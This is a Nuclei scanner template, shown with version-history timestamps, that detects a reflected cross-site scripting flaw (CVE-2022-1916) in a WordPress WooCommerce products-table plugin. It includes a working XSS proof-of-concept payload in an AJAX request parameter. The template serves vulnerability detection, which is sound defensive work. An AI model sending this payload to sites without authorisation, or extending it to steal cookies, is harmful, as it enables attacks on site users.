nuclei-templates/http/cves/2022/CVE-2022-1916.yaml

57 lines
2.0 KiB
YAML
Raw Normal View History

2022-11-23 08:37:45 +00:00
id: CVE-2022-1916
info:
name: WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting
2022-11-23 08:37:45 +00:00
author: Akincibor
severity: medium
2022-11-23 08:38:54 +00:00
description: |
WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 11:59:08 +00:00
remediation: |
Update to version 1.0.5 or later of the WordPress Active Products Tables for WooCommerce plugin to mitigate this vulnerability.
2022-11-23 08:37:45 +00:00
reference:
- https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
2022-11-23 08:38:54 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1916
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-11-23 08:38:54 +00:00
cve-id: CVE-2022-1916
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00097
2023-08-31 11:46:18 +00:00
epss-percentile: 0.39802
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:pluginus:active_products_tables_for_woocommerce:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: pluginus
product: active_products_tables_for_woocommerce
2023-09-06 11:59:08 +00:00
framework: wordpress
2023-07-11 19:49:27 +00:00
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp
2022-11-23 08:37:45 +00:00
http:
2022-11-23 08:37:45 +00:00
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
2022-11-23 08:38:54 +00:00
- type: word
part: body
words:
- 'woot-content-in-popup'
- 'woot-system'
- 'woot-table'
condition: or
2022-11-23 08:37:45 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200